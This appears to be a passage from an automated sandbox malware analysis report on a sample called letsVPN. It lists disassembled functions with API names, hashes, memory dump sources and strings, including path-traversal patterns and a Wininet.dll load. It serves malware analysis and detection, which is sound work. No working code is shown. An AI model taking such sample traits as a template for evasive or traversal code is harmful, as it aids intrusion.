                                                                                                                                                                                                    • API ID: AllocHeap_callnewh_errno_getptd_noexit
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2695012009-0
                                                                                                                                                                                                    • Opcode ID: 434ecd270a531c1519dc5c3a6aba881fda096fec1286d07f1f3894ac84f37915
                                                                                                                                                                                                    • Instruction ID: 2271e818a1b34b70de02395edb8bf6eda8b294e3d6373a1e4236db750925dcdd
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 434ecd270a531c1519dc5c3a6aba881fda096fec1286d07f1f3894ac84f37915
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4011D671304A4885FFD74B25EAC6BD473919B4CBE4F08C624AA16867D1EF78CA88C309
                                                                                                                                                                                                    Function 0000000180003BF4 Relevance: 4.5, APIs: 3, Instructions: 26sleepCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Sleep$Count64Tick
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2406120688-0
                                                                                                                                                                                                    • Opcode ID: c0c22c2c1a5e76ecd7b74dd1cf3ec3cfc78094375de2df049903c45216d92349
                                                                                                                                                                                                    • Instruction ID: 92bd6339b58cb285b0f30baeb0f528f25b43fd05f0c0e39d9b1d2ed948a9e1d4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c0c22c2c1a5e76ecd7b74dd1cf3ec3cfc78094375de2df049903c45216d92349
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 46E0D83571044943FB9E6BB66C893E42242A74D3A1F08C738FD22C53D1CD28968D0300
                                                                                                                                                                                                    Function 0000000180001170 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                                                                    • String ID: Wininet.dll
                                                                                                                                                                                                    • API String ID: 1029625771-1097394720
                                                                                                                                                                                                    • Opcode ID: ed853e58cac82df4465cd12f77fdbce7e76860c75398a916c4f7a54753ede6d9
                                                                                                                                                                                                    • Instruction ID: 073e485c13a7e7b27ab9e0a86162a95eb8d7bb4fc7f8916facea9738f35552a7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ed853e58cac82df4465cd12f77fdbce7e76860c75398a916c4f7a54753ede6d9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5CC04838A66E18D6E796AB05AC8938423A2A35D350FD08010800981220AE6C92AE8704
                                                                                                                                                                                                    Function 0000000180003B3C Relevance: 3.0, APIs: 2, Instructions: 41COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FolderFromListLocationPathSpecial
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4082711253-0
                                                                                                                                                                                                    • Opcode ID: 184cb7061c3642203eff8c54a320cb8dbe641d72029d754cca35c4258ce58e64
                                                                                                                                                                                                    • Instruction ID: feab0ae93b2b30bbcc2224f3f5fcba4d06cd33ee75b1b09efc6b2fb10b5be483
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 184cb7061c3642203eff8c54a320cb8dbe641d72029d754cca35c4258ce58e64
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D0115E32228A8492EB61DF61E9943DAB360FB8C784F805115FB8D07A59DF7CC3588B40
                                                                                                                                                                                                    Function 000000018000CBB8 Relevance: 1.5, APIs: 1, Instructions: 45fileCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FileRead
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2738559852-0
                                                                                                                                                                                                    • Opcode ID: 9666489a833a73eff41d0b3baec99d27baec5b800e83a14c7402f0aa1abc0318
                                                                                                                                                                                                    • Instruction ID: acc06959da3d9712720987d0b20ddc4dba30eb22f803056048d3d8fea3528b98
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9666489a833a73eff41d0b3baec99d27baec5b800e83a14c7402f0aa1abc0318
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E111AC72710AA887E745CB16D540B987BA0B388FC0F18C126EF4843755CF74D959CB40
                                                                                                                                                                                                    Function 000000018000CC4C Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FilePointer
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                                                                                    • Opcode ID: fc0ea25f90da82498166189dbe9598355ec11401fdfaf2546442f37b59e2b66a
                                                                                                                                                                                                    • Instruction ID: 56483d2a9befe1b8b596d06e987917f3c630e3ce225550242b47b491e13c95c6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fc0ea25f90da82498166189dbe9598355ec11401fdfaf2546442f37b59e2b66a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DF017172B2515886FBF7C729C194FA93690D36D784E74C105E50D06A90DD168A8A9F03
                                                                                                                                                                                                    Function 000000018000CCC8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FilePointer
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                                                                                    • Opcode ID: 246a4a6351a4c6fdf35d294530dfbe8373b88ff892669a6b1248780a686fec8b
                                                                                                                                                                                                    • Instruction ID: 370f273d4e0260f5760ccfb9bde25e09b1d70ed71676843be9854db92f8c4394
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 246a4a6351a4c6fdf35d294530dfbe8373b88ff892669a6b1248780a686fec8b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9DE0267261508886F7B7CB3DC084FA93BA2830CB88F28C414EE0E12280CE26C6DF9701
                                                                                                                                                                                                    Function 0000000180003102 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ExitProcess
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 621844428-0
                                                                                                                                                                                                    • Opcode ID: f9e1fab9efc598d66fbb79237c1423fa25954eb310448d5e60bbd672ac8ab111
                                                                                                                                                                                                    • Instruction ID: 2214d58ec07041e1d9f2035fec5d9a05c868a091659b50a81ce1d858af0d3717
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f9e1fab9efc598d66fbb79237c1423fa25954eb310448d5e60bbd672ac8ab111
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5090023050470852E65E9B20549975812246709755F00481D550340454CD2985184200

                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                    Function 0000000180009BBC Relevance: 19.6, APIs: 7, Strings: 4, Instructions: 343timeCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: wcsstr$File$Time$ByteCharLocalMultiPointerWidewcscpy
                                                                                                                                                                                                    • String ID: /../$/..\$\../$\..\
                                                                                                                                                                                                    • API String ID: 2997815599-3885502717
                                                                                                                                                                                                    • Opcode ID: 73e90b5781355c026e4f44748d29e5f9f8853ab8c3945732c1ff4fdd186b9a52
                                                                                                                                                                                                    • Instruction ID: 0b4cf74cff9bb6ad9da9143f84b15d340c06d9b2b76d1b36e80c1d71b783d103
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 73e90b5781355c026e4f44748d29e5f9f8853ab8c3945732c1ff4fdd186b9a52
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 87E1D23260568886EBA6CF65E4807DEB7E0F7897C4F54C026EE8A47785DF38D609CB00
                                                                                                                                                                                                    Function 000000018001BBCD Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 127COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _invoke_watson$wcscspn
                                                                                                                                                                                                    • String ID: .$_.,
                                                                                                                                                                                                    • API String ID: 1707156713-3384562259
                                                                                                                                                                                                    • Opcode ID: 330da3cf74221dcfec55f0d7c27dc5aa7eba75c17d4802ee0e85fab0e1c6c3c9
                                                                                                                                                                                                    • Instruction ID: b0fc5f76ffcb9960392ef42f77fbae1970b7befc858140f1ab578103345b96ab
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 330da3cf74221dcfec55f0d7c27dc5aa7eba75c17d4802ee0e85fab0e1c6c3c9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B0412331704B4C41FBFAAA26B4117EA6299A74C7C4F90C926BF4983A86EF74C749C340
                                                                                                                                                                                                    Function 00000001800278D5 Relevance: 7.5, APIs: 5, Instructions: 47memoryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Heap$FreeProcess_errno_lseeki64_nolock_setmode_nolock
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 225511624-0
                                                                                                                                                                                                    • Opcode ID: 62fd43c9a7a1900edd905e455bd74925793bd9a4038350885f1d5a85c33384c3
                                                                                                                                                                                                    • Instruction ID: e170ef0dd857d4d1927c2d7ad55283b08b578037938fe0c670b5775163442cfa
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 62fd43c9a7a1900edd905e455bd74925793bd9a4038350885f1d5a85c33384c3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2301C431304A5882EAE75B2868093ED53526B4DBF0F188312FE39077D7DE38C64A8701
                                                                                                                                                                                                    Function 000000014006BC9C Relevance: 7.5, APIs: 5, Instructions: 39timethreadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2239857169.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2239823102.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2240005982.0000000140081000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2240059649.00000001400B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2240796539.00000001400B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2240796539.0000000140AB4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2242622200.0000000140E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2242796796.00000001410C1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2242796796.0000000141AC1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244219068.0000000141F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244243523.0000000141F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_140000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1445889803-0
                                                                                                                                                                                                    • Opcode ID: 892a3ebab87a0513f23e75662c33cb5c65145fa5cc2fdb9ecd944fbbdd7018f7
                                                                                                                                                                                                    • Instruction ID: eb0e9a72c1070ba67a247c4e2d22537436e33b9092eccdb49ccfd359c4d295c9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 892a3ebab87a0513f23e75662c33cb5c65145fa5cc2fdb9ecd944fbbdd7018f7
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7A012D32225F4486E7928F22E8543D56364FB4DBD0F586521FF9E47BB4DB38CA958700
                                                                                                                                                                                                    Function 000000018000DDF0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 000000018000DE73
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DebugDebuggerErrorLastOutputPresentString
                                                                                                                                                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                                                    • API String ID: 389471666-631824599
                                                                                                                                                                                                    • Opcode ID: 0729cf235f289e4ed8bbd33f0e26635c52233a112e2d8750ea279f1aac1ac0a9
                                                                                                                                                                                                    • Instruction ID: 2b860f793b5af0edec94a73f4ee2df70cd83d2f14e2db46e587fa401933e544a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0729cf235f289e4ed8bbd33f0e26635c52233a112e2d8750ea279f1aac1ac0a9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 38117032210B48A7FB86DB26E6443E933B4FB1C395F548125E70982A61EF79D27CC710
                                                                                                                                                                                                    Function 000000018000B35C Relevance: 5.6, Strings: 4, Instructions: 567COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: invalid bit length repeat$invalid block type$invalid stored block lengths$too many length or distance symbols
                                                                                                                                                                                                    • API String ID: 0-26694007
                                                                                                                                                                                                    • Opcode ID: 256f91a70c9afeee36dbb25d12fbb447125e18a01c1cf04cb194e42f51fe4d09
                                                                                                                                                                                                    • Instruction ID: b769c965244b2721c296923db2336362b01c4c05965258fb1307178c8f15bbbc
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 256f91a70c9afeee36dbb25d12fbb447125e18a01c1cf04cb194e42f51fe4d09
                                                                                                                                                                                                    • Instruction Fuzzy Hash: ED32AF72214A888BE7B5CF15E4547AE77A5F388784F108119EB8B87B94DF78DA48CF01
                                                                                                                                                                                                    Function 0000000180016BCF Relevance: 3.0, APIs: 2, Instructions: 45COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CaptureContext$CurrentDebuggerEntryFunctionLookupPresentUnwindVirtual__crt
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2948380444-0
                                                                                                                                                                                                    • Opcode ID: 66739755158ac0f65a064220c3e4229bb1c1d425591bde9882ab8bae3f2a95ea
                                                                                                                                                                                                    • Instruction ID: 5483c2a3af3abbff20748878bdae70ae010b4b47d7495b036be8681c7a2e8416
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 66739755158ac0f65a064220c3e4229bb1c1d425591bde9882ab8bae3f2a95ea
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A3116A36605F8489EBA1CF20D8807DE73A4F788798F408216FA8D47B99EF38C649C744
                                                                                                                                                                                                    Function 000000018001650C Relevance: 1.5, APIs: 1, Instructions: 14COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: EnumLocalesSystem
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2099609381-0
                                                                                                                                                                                                    • Opcode ID: 4efd85538ee5ccf830b5393b3d7e8f79fe04d4581bf56c2a2b08e2d8d0e36e47
                                                                                                                                                                                                    • Instruction ID: 831c55dee90e53978df5b1189dc5e0f709427b15748c518f55f0954f494d9295
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4efd85538ee5ccf830b5393b3d7e8f79fe04d4581bf56c2a2b08e2d8d0e36e47
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C5E0E235E04E0CC6F7D39B42FCDA7A12762B36C349F909105D80C06A7ADEAC83AD8700
                                                                                                                                                                                                    Function 000000018002A280 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 57c31cab47b3682ef4e0aa5da82245482946a0716f90dcbebe064f2c9ed956c8
                                                                                                                                                                                                    • Instruction ID: f25fc49b57f15dd57e683d98241053a8c56c7c3e29ab56c35713009a64574da5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 57c31cab47b3682ef4e0aa5da82245482946a0716f90dcbebe064f2c9ed956c8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B421826B50EAC98BF6E3495808667CC2FD5E76BB54F4DD04BE740C7283ED0A5A0D8712
                                                                                                                                                                                                    Function 000000018002A2A0 Relevance: .1, Instructions: 59COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
